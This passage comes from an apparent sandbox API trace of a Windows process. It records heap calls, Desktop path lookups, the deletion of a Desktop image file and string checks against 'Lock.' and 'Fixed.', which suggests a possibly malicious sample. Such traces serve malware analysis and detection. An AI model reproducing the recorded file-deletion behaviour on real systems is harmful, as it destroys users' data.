lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0164.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0164.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0164.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0164.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0164.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0164.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0164.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0164.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0164.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416f30 [0164.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0164.423] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0164.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0164.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0164.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa920 [0164.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0164.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0164.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa878 [0164.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0164.423] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf440 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0164.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0164.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0164.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0164.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0164.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0164.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0164.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0164.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0164.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0164.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0164.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0164.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0164.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0164.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0164.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0164.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0164.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0164.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0164.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0164.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0164.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xd0) returned 0x2416f30 [0164.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0164.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0164.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0164.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0164.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0164.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x64) returned 0x24202f0 [0164.425] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/DrmlVcs.bmp", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DrmlVcs.bmp", lpFilePart=0x8bedfc*="DrmlVcs.bmp") returned 0x31 [0164.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24202f0 | out: hHeap=0x25c0000) returned 1 [0164.425] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DrmlVcs.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\drmlvcs.bmp")) returned 0x20 [0164.425] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DrmlVcs.bmp", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd27d0d0, ftCreationTime.dwHighDateTime=0x1d4cbfb, ftLastAccessTime.dwLowDateTime=0x5c25220, ftLastAccessTime.dwHighDateTime=0x1d4d04c, ftLastWriteTime.dwLowDateTime=0x5c25220, ftLastWriteTime.dwHighDateTime=0x1d4d04c, nFileSizeHigh=0x0, nFileSizeLow=0x159aa, dwReserved0=0x39, dwReserved1=0x4, cFileName="DrmlVcs.bmp", cAlternateFileName="")) returned 0xaa56a0 [0164.425] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DrmlVcs.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\drmlvcs.bmp")) returned 1 [0164.427] FindNextFileW (in: hFindFile=0xaa56a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd27d0d0, ftCreationTime.dwHighDateTime=0x1d4cbfb, ftLastAccessTime.dwLowDateTime=0x5c25220, ftLastAccessTime.dwHighDateTime=0x1d4d04c, ftLastWriteTime.dwLowDateTime=0x5c25220, ftLastWriteTime.dwHighDateTime=0x1d4d04c, nFileSizeHigh=0x0, nFileSizeLow=0x159aa, dwReserved0=0x39, dwReserved1=0x4, cFileName="DrmlVcs.bmp", cAlternateFileName="")) returned 0 [0164.427] FindClose (in: hFindFile=0xaa56a0 | out: hFindFile=0xaa56a0) returned 1 [0164.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0164.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0164.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0164.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0164.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0164.427] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0164.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0164.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0164.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0164.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0164.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0164.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0164.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0164.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0164.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416f30 [0164.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0164.428] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0164.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0164.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0164.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa878 [0164.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0164.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0164.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ac978 [0164.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0164.428] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf440 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0164.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0164.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0164.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0164.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0164.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0164.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0164.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0164.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0164.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0164.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0164.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0164.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0164.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0164.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0164.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0164.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0164.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0164.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0164.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0164.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0164.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xd0) returned 0x2416f30 [0164.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0164.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0164.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0164.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0164.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0164.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0164.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0164.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0164.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0164.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0164.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0164.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0164.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0164.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0164.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0164.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0164.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x64) returned 0x24202f0 [0164.430] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/DrmlVcs.bmp", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DrmlVcs.bmp", lpFilePart=0x8bf658*="DrmlVcs.bmp") returned 0x31 [0164.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24202f0 | out: hHeap=0x25c0000) returned 1 [0164.430] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DrmlVcs.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\drmlvcs.bmp")) returned 0xffffffff [0164.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0164.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0164.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0164.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0164.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0164.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0164.430] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0164.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0164.431] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0164.431] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0164.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0164.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0164.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0164.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0164.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0164.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0164.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0164.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0164.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0164.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0164.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0164.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0164.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0164.431] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eGIW Yzvh.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0164.431] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIW Yzvh.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0164.431] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IW Yzvh.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0164.431] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="W Yzvh.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0164.431] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" Yzvh.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0164.432] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Yzvh.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0164.432] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zvh.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0164.432] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vh.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0164.432] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0164.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0164.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0164.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0164.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0164.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0164.432] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0164.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0164.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0164.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0164.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0164.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0164.432] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eGIW Yzvh.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0164.432] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIW Yzvh.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0164.432] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IW Yzvh.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0164.432] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="W Yzvh.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0164.432] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" Yzvh.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0164.432] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Yzvh.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0164.432] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zvh.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0164.433] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vh.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0164.433] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0164.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0164.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0164.433] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0164.433] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0164.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0164.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0164.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa878 [0164.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0164.433] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0164.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0164.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0164.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0164.433] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0164.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0164.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0164.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa920 [0164.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0164.434] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0164.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0164.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0164.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0164.434] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0164.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0164.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0164.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0164.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0164.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0164.434] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0164.434] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.434] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0164.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0164.434] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0164.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0164.434] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0164.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0164.435] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 